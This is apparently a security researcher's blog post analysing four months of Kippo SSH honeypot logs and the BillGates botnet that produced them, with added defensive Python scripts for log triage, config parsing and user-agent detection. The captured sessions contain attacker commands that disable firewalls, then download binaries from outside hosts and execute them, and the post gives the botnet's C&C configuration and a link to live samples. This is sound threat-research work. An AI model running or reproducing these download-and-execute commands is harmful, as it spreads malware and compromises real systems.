Inside a Kippo honeypot: how the billgates botnet spreads

A few months ago I decided to install a honeypot to find new threats and to collect new malware to analyze. There were several honeypots I had in mind to try, but for now I have chosen Kippo.

From Kippo’s homepage: “Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.” (To see all the features offered by this honeypot, consult Kippo’s homepage.)

I will not dwell on the installation and the features that Kippo offers, because this post is intended to be a final report with statistics and graphs after months in operation. Regarding the configuration tips & tricks I used, here are some links that will be very helpful in building a similar setup:

My honeypot is a sort of ‘fork’ of the original Kippo from desaster’s GitHub repo, into which I merged some changes to hide or improve Kippo itself: improvements like SFTP, direct-tcp, exec stdin logging, SSH algorithm updates, JSON logging, etc. from Michel Oosterhof’s Kippo fork, all the extra commands from the kippo-extra GitHub repo, and some minor changes. Then I applied a few workarounds/patches to hide my Kippo honeypot from identification attempts.

The honeypot is located in Singapore; it was turned on 1st September 2014 and stopped 31 December 2014, so I have collected 4 months of data. During that period, apart from the occasional visit from someone playing with nmap, the attacks I received came almost entirely from a very specific botnet, on which I will spend a few words at the end of the post.

Data such as connections, downloads and command inputs are saved in a database and, thanks to the Kippo-Graph script from BruteForce Lab, can be viewed very conveniently in a browser.

Now let’s get into the statistics.

Honeypot activity

[Figure: Honeypot activity]

Success ratio

The total number of login attempts is 112467, but how many of these were successful?

[Figure: Success ratio]

Just under 4% of the logins succeeded. But why? Let’s look at the usernames and passwords used to log in to SSH.

Top 10 usernames – User

[Figure: Top 10 usernames]

Top 10 passwords – Password

[Figure: Top 10 passwords]

Top 10 User-Pass combos – Combo

[Figure: Top 10 user/password combinations]

OK, some strange user/password combinations have been used, probably the result of a dictionary-based script used by the botnet. Clearly the most common attempt, 46% of the total, was made using root/admin. In fact 3644 is very close to the number of successful logins.

Now let’s see which SSH clients were used to try to log in to the honeypot.

Top 10 SSH clients

[Figure: Top 10 SSH clients]

PuTTY stands out clearly.

Let’s now analyze the human activity performed on the honeypot.

Top 10 commands

[Figure: Top 10 commands (overall input)]

Not many sessions were used interactively by an operator (maybe they found out they were playing on a honeypot?); just 39 sessions were recorded.

Let’s now try to understand the origin of these connections.

Connections per IP – IP

[Figure: Connections per IP (pie chart)]

[Figure: Geolocation of connections – GEO]

The traffic comes entirely from China! So we can make an educated guess about the origin of the botnet.

Below is the IP information:

[Figure: IP info]
inetnum: 103.41.124.0 - 103.41.127.255
netname: HEETHAILIMITED-HK
descr: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG
country: HK
admin-c: HA259-AP
tech-c: HA259-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HEETHAILIMITED-HK
mnt-routes: MAINT-HEETHAILIMITED-HK
mnt-irt: IRT-HEETHAILIMITED-HK
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20141021
source: APNIC
irt: IRT-HEETHAILIMITED-HK
address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077
e-mail: ming@heethai.com
abuse-mailbox: ming@heethai.com
admin-c: HA259-AP
tech-c: HA259-AP
auth: # Filtered
mnt-by: MAINT-HEETHAILIMITED-HK
changed: hm-changed@apnic.net 20141020
source: APNIC
role: HEETHAILIMITED administrator
address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077
country: HK
phone: +855-78-585-191
fax-no: +855-78-585-191
e-mail: ming@heethai.com
admin-c: HA259-AP
tech-c: HA259-AP
nic-hdl: HA259-AP
mnt-by: MAINT-HEETHAILIMITED-HK
changed: hm-changed@apnic.net 20141020
source: APNIC

The Whois service tells us that the IP is located in Hong Kong, but digging deeper some more interesting information can be gathered, like this:

103.41.124.46: SCAN SSH BruteForce Tool with fake PUTTY version
103.41.124.46: SSH Brute Force

Interesting, right? Yes, those are SSH brute-forcing servers.

These are typical sessions, with a human operator on the keyboard, recorded by the honeypot.

First example:

my3:~# /etc/init.d/iptables stop
bash: /etc/init.d/iptables: command not found
my3:~# service iptables stop
bash: service: command not found
my3:~# SuSEfirewall2 stop
bash: SuSEfirewall2: command not found
my3:~# reSuSEfirewall2 stop
bash: reSuSEfirewall2: command not found
my3:~# cd /tmp/
my3:/tmp# wget -c http://42.96.191.5:300/arm
--2014-10-12 11:42:18-- http://42.96.191.5:300/arm
Connecting to 42.96.191.5:300... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1001465 (977K) [application/octet-stream]
Saving to: `arm


0% [> ] 4,356 1K/s eta 11m 9s
chmod 0755 /tmp/arm
1% [> ] 10,148 1K/s eta 8m 20s
./arm &
2% [> ] 24,628 2K/s eta 5m 34s
wget -c http://42.96.191.5:300/mips
3% [=> ] 35,028 2K/s eta 7m 12s
chmod 0755 /tmp/mips
./mips &
wget -c http://42.96.191.5:300/wrt
7% [==> ] 72,988 2K/s eta 5m 33s
chmod 0755 /tmp/wrt
./wrt &
16% [======> ] 168,844 4K/s eta 3m 8s
*** End of log! ***

Second example:

my3:~# uname -a
Linux my3 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
my3:~# wget http://121.40.141.102:8081/Syn1
--2014-09-23 06:06:43-- http://121.40.141.102:8081/Syn1
Connecting to 121.40.141.102:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1524643 (1M) [application/octet-stream]
Saving to: `Syn1


100%[======================================>] 1,524,643 125K/s

2014-09-23 06:06:55 (125 KB/s) - `Syn1' saved [1524643/1524643]
my3:~# chmod 777 Syn1
my3:~# ./Syn1
bash: ./Syn1: command not found
my3:~#
*** End of log! ***


– From the SSH brute-force script (botnet):

bash: /etc/init.d/iptables: command not found
rm: cannot remove `/var/spool/cron/crontabs': No such file or directory
rm: cannot remove `/var/spool/cron/crontabs': No such file or directory
--2014-09-20 06:45:51-- http://www.frade8c.com:9162/root
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187350 (182K) [application/octet-stream]
Saving to: `root


100%[======================================>] 187,350 66K/s

2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]
--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187350 (182K) [application/octet-stream]
Saving to: `root


25% [=========> ] 47,538 12K/s eta 11s

Length: 187350 (182K) [application/octet-stream]
Saving to: `root

100%[======================================>] 187,350 66K/s

2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]
--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187350 (182K) [application/octet-stream]
Saving to: `root

100%[======================================>] 187,350 17K/s

2014-09-20 06:46:03 (17 KB/s) - `root' saved [187350/187350]
--2014-09-20 06:46:03-- http://www.frade8c.com:9162/jdhe
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1554782 (1M) [application/octet-stream]
Saving to: `jdhe

20% [=======> ] 313,968 71K/s eta 17s

[...]
*** End of log! ***
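All three sessions above (the two interactive ones and the scripted one) follow the same pattern: try to stop the host firewall, fetch a binary into /tmp, chmod it and run it in the background. The following is an added example, not code from the original post or from Kippo, that triages (session_id, command) records of the kind Kippo stores in its database and flags sessions where a downloaded file is later executed. The sample rows are constructed from the sessions shown above; the one-line form of session s4 is a constructed variant of the scripted session, whose exact command line the log does not show.

```python
"""Triage Kippo command-input records for the download-and-execute pattern.

Added example; not code from the original post or from Kippo. Input is a list
of (session_id, command_line) pairs; the sample below is constructed from the
sessions shown in the post.
"""
import os
import re
from urllib.parse import urlsplit

# Constructed sample rows (URLs and IPs as they appear in the post's logs).
SAMPLE_INPUT = [
    ("s1", "/etc/init.d/iptables stop"),
    ("s1", "service iptables stop"),
    ("s1", "cd /tmp/"),
    ("s1", "wget -c http://42.96.191.5:300/arm"),
    ("s1", "chmod 0755 /tmp/arm"),
    ("s1", "./arm &"),
    ("s1", "wget -c http://42.96.191.5:300/mips"),
    ("s1", "chmod 0755 /tmp/mips"),
    ("s1", "./mips &"),
    ("s2", "uname -a"),
    ("s2", "wget http://121.40.141.102:8081/Syn1"),
    ("s2", "chmod 777 Syn1"),
    ("s2", "./Syn1"),
    ("s3", "uname -a"),          # benign reconnaissance only
    ("s3", "cat /proc/cpuinfo"),
    # Constructed one-line variant of the scripted (botnet) session.
    ("s4", "/etc/init.d/iptables stop; cd /tmp; wget http://www.frade8c.com:9162/root && chmod 0755 root; ./root &"),
]

COMMAND_SEPARATOR = re.compile(r"\s*(?:;|&&|\|\|)\s*")
# Matches the firewall-stop attempts seen in the logs (iptables / SuSEfirewall2).
FIREWALL_STOP = re.compile(r"(?:iptables|SuSEfirewall2)\S*\s+(?:stop|-F)(?:\s|$)")
DROP_DIRS = ("./", "/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"wget", "curl"}


def split_commands(line):
    """Split 'a; b && c &' into ['a', 'b', 'c'], dropping the backgrounding '&'."""
    return [c.rstrip("& ").strip() for c in COMMAND_SEPARATOR.split(line) if c.strip()]


def classify(cmd):
    """Return (kind, detail) for one command: firewall_off, download, execute or None."""
    tokens = cmd.split()
    if not tokens:
        return None, None
    if FIREWALL_STOP.search(cmd):
        return "firewall_off", cmd
    if tokens[0] in DOWNLOADERS:
        for t in tokens[1:]:
            if t.startswith(("http://", "https://", "ftp://")):
                return "download", t
    if tokens[0].startswith(DROP_DIRS):
        return "execute", os.path.basename(tokens[0])
    return None, None


def triage_sessions(rows):
    """Group commands by session and flag sessions that fetch and then run a payload."""
    sessions = {}
    for session_id, line in rows:
        s = sessions.setdefault(
            session_id, {"firewall_off": False, "downloads": [], "executed": []}
        )
        for cmd in split_commands(line):
            kind, detail = classify(cmd)
            if kind == "firewall_off":
                s["firewall_off"] = True
            elif kind == "download":
                s["downloads"].append(detail)
            elif kind == "execute":
                s["executed"].append(detail)
    for s in sessions.values():
        # A session is flagged when the basename of a fetched URL is later executed.
        fetched = {os.path.basename(urlsplit(u).path) for u in s["downloads"]}
        s["download_and_execute"] = bool(fetched & set(s["executed"]))
    return sessions


if __name__ == "__main__":
    for sid, info in triage_sessions(SAMPLE_INPUT).items():
        print(sid, info)
```

The flagged sessions hand you the two things worth acting on: the download URLs (host:port pairs to block or hunt for in proxy logs) and the firewall-stop attempt, which on a real host is a strong sign of a compromise in progress. `curl -o name` and `sh name` style variants are not covered here and would need extra rules.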


Botnet Info

The large amount of data recorded by the honeypot refers to a very specific botnet: the BillGates botnet. I came to this conclusion after analyzing the IPs and samples captured by Kippo and after doing some research with Google. Here you can download the latest fresh samples captured by Kippo (30 December) (password: infected).

I uploaded just one copy of each file since there were a lot of duplicates. See below:

[Table: MD5 – Samples]

I preferred not to publish any file analysis because there is enough information online; in particular, on the Kernelmode Forum there is very interesting information and there are links, the same information that I found by analyzing the various modules. The only thing that varies is obviously the C&C IP address (dead at the moment) and some minor code changes. Some modules were packed with UPX, so I have already unpacked them. These modules are the botnet’s modules (originally named atddd and cupsdd(h); names usually differ from version to version).

Below is some info gathered from the botnet’s main module, cupsdd(h):

The configuration string decrypted with the RSA routine is:

v9.jack52088.com:5168:1:1: :1:698412:697896:697380

which, after being split on ‘:’, is assigned to these parameters:

g_strConnTgts = v9.jack52088.com (61.174.48.17) - C&C IP address
g_iGatsPort = 5168 - C&C server's port
g_iGatsIsFx = 1
g_iIsService = 1
g_strForceNote =
g_bDoBackdoor = 1
g_strCryptStart = 698412
g_strDStart = 697896
g_strNStart = 697380

C&C server information: Link
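To make the split described above concrete, here is an added example (not code from the original post or from the botnet’s source) that parses the decrypted configuration string into the nine named globals and derives the indicators a defender would feed to a blocklist or IDS rule. The field order comes from the listing above; treating the g_i/g_b fields as integers and the g_str fields as strings is an assumption based on the naming prefixes.

```python
"""Parse the decrypted BillGates (cupsdd) configuration string.

Added example; not code from the original post or from the botnet's source.
The colon-separated format and the nine field names are taken from the post;
typing g_i/g_b fields as int and g_str fields as str is an assumption based on
the variable-name prefixes.
"""

# Field order exactly as listed in the post.
FIELD_NAMES = (
    "g_strConnTgts",    # C&C host
    "g_iGatsPort",      # C&C port
    "g_iGatsIsFx",
    "g_iIsService",
    "g_strForceNote",
    "g_bDoBackdoor",
    "g_strCryptStart",
    "g_strDStart",
    "g_strNStart",
)

# Copied from the decrypted string shown in the post.
SAMPLE_CONFIG = "v9.jack52088.com:5168:1:1: :1:698412:697896:697380"


def parse_config(decrypted: str) -> dict:
    """Split the decrypted string on ':' and map each field to its global name.

    The empty g_strForceNote field is a single space in the sample, so values
    are stripped before use; a wrong field count raises rather than silently
    mis-assigning the C&C port.
    """
    fields = decrypted.split(":")
    if len(fields) != len(FIELD_NAMES):
        raise ValueError(
            f"expected {len(FIELD_NAMES)} colon-separated fields, got {len(fields)}"
        )
    cfg = {}
    for name, raw in zip(FIELD_NAMES, fields):
        value = raw.strip()
        cfg[name] = int(value) if name.startswith(("g_i", "g_b")) else value
    return cfg


def c2_indicators(cfg: dict) -> dict:
    """Derive the blockable/detectable facts from a parsed configuration."""
    host, port = cfg["g_strConnTgts"], cfg["g_iGatsPort"]
    return {
        "c2_host": host,
        "c2_port": port,
        "c2_endpoint": f"{host}:{port}",
        "installs_as_service": bool(cfg["g_iIsService"]),
        "backdoor_enabled": bool(cfg["g_bDoBackdoor"]),
    }


if __name__ == "__main__":
    parsed = parse_config(SAMPLE_CONFIG)
    for name, value in parsed.items():
        print(f"{name} = {value!r}")
    print(c2_indicators(parsed))
```

Because the C&C is given as a hostname, the resolved address (61.174.48.17 at the time of the post) can change between samples; a detection rule should key on the hostname and port, with the IP as a secondary indicator.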

Attack vectors:

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
9CAttackIe

User agents used:

Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17
Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0
Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|
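The three templates are only useful to a defender once they are turned into something that can be matched against web-server logs. The following added example (not code from the original post or from the botnet) compiles each template into a regex plus a list of numeric ranges and scans constructed Apache-style log lines for requests whose User-Agent could have been generated by them. The interpretation of the placeholders is an assumption: |S| is taken to be an arbitrary platform string inside the parentheses, and |D&lo&hi| a random integer between lo and hi inclusive.

```python
"""Detect BillGates HTTP-flood traffic by its User-Agent templates.

Added example; not code from the original post or the botnet. The three
templates are copied from the post; the placeholder semantics (|S| = platform
string, |D&lo&hi| = integer in [lo, hi]) are an assumption.
"""
import re
from collections import Counter

TEMPLATES = (
    "Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) "
    "Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17",
    "Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0",
    "Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| "
    "Version/|D&11&12|.|D&10&19|",
)

PLACEHOLDER = re.compile(r"\|S\||\|D&(\d+)&(\d+)\|")


def compile_template(template):
    """Turn a template into (regex, [(lo, hi), ...]) with one group per |D| slot."""
    parts, ranges, pos = [], [], 0
    for m in PLACEHOLDER.finditer(template):
        parts.append(re.escape(template[pos:m.start()]))
        if m.group(0) == "|S|":
            parts.append(r"[^()]+")   # assumption: platform string without parentheses
        else:
            ranges.append((int(m.group(1)), int(m.group(2))))
            parts.append(r"(\d+)")
        pos = m.end()
    parts.append(re.escape(template[pos:]))
    return re.compile("".join(parts)), ranges


COMPILED = [compile_template(t) for t in TEMPLATES]


def match_template(user_agent):
    """Return the index of the template the UA could come from, or None.

    The regex accepts any digits; the range check rejects values the generator
    could never produce (e.g. Chrome/30 paired with AppleWebKit/537.17).
    """
    for idx, (regex, ranges) in enumerate(COMPILED):
        m = regex.fullmatch(user_agent)
        if m and all(lo <= int(g) <= hi for g, (lo, hi) in zip(m.groups(), ranges)):
            return idx
    return None


# Apache/nginx combined log: client IP first, User-Agent as the last quoted field.
LOG_LINE = re.compile(r'^(?P<ip>\S+) .*"(?P<ua>[^"]*)"\s*$')

# Constructed sample log lines (addresses from the RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Sep/2014:06:45:51 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.3.4521.57 Safari/537.17"',
    '203.0.113.7 - - [20/Sep/2014:06:45:51 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.16"',
    '203.0.113.7 - - [20/Sep/2014:06:45:52 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"',
    '198.51.100.9 - - [20/Sep/2014:06:45:52 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"',
    '198.51.100.9 - - [20/Sep/2014:06:45:53 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/30.0.1500.50 Safari/537.17"',
]


def suspicious_sources(log_lines):
    """Count, per client IP, the requests whose UA matches a BillGates template."""
    hits = Counter()
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and match_template(m.group("ua")) is not None:
            hits[m.group("ip")] += 1
    return dict(hits)


if __name__ == "__main__":
    print(suspicious_sources(SAMPLE_LOG))
```

The Chrome and Opera templates are fairly specific (a Chrome 23–25 build announcing AppleWebKit/537.17 was already old when these samples were captured), but the Firefox template is indistinguishable from a genuine Firefox 18 client, so a match on it only means something combined with request rate per source.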

IPs hardcoded for the DNS amplification attack: Here (too long to list)

Source files of the project:

crtstuff.c
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
Manager.cpp
MiniHttpHelper.cpp
ProtocolUtil.cpp
ProvinceDns.cpp
StatBase.cpp
SysTool.cpp
ThreadAtk.cpp
ThreadClientStatus.cpp
ThreadConnection.cpp
ThreadFakeDetect.cpp
ThreadHttpGet.cpp
ThreadLoopCmd.cpp
ThreadMonGates.cpp
ThreadRecycle.cpp
ThreadShell.cpp
ThreadShellRecycle.cpp
ThreadTask.cpp
ThreadUpdate.cpp
UserAgent.cpp
AutoLock.cpp
BigInt.cpp
FileOp.cpp
Log.cpp
Media.cpp
NetBase.cpp
RSA.cpp
ThreadCondition.cpp
Thread.cpp
ThreadMutex.cpp
Utility.cpp
WinDefSVC.cpp

To track this botnet you can use the BillGates Botnet Tracker, developed by the discoverer of the botnet itself.

So that’s all, after 4 months of Kippo honeypotting. I will continue to collect data and configure new honeypots, and I will come back with updated findings.

Antelox

Comments

  1. Hey, this is Ion, from BruteForce Labs. Great article!! And thanks for using Kippo-Graph 🙂

  2. Thanks for using my code! Nice overview of BillGates.

    If you want to do more analysis, my version now also includes a logstash parser so you can enrich with GeoIP and load into ElasticSearch and use Kibana for graphs.

    Did you find anything else interesting besides BillGates? Latest interesting findings I have are something connecting to French sites with direct-tcpip, which I don’t understand yet and something looking for ‘ubnt’ (ubiquity networks) wifi access points.

    • Hi Michel, your fork is awesome! Thanks…
      OK for the new version, I’ll check it out immediately. =)

      About the BillGates botnet and the connection to French sites, I honestly don’t know. I analyzed only a couple of samples (the last captured) to better understand what I had in my hands, but not all the samples (about 10GB).
      BTW, it has been about 3 weeks since I turned off the server because I’m moving around, so I’m missing the latest attacks/samples.

      Regards,
      Antelox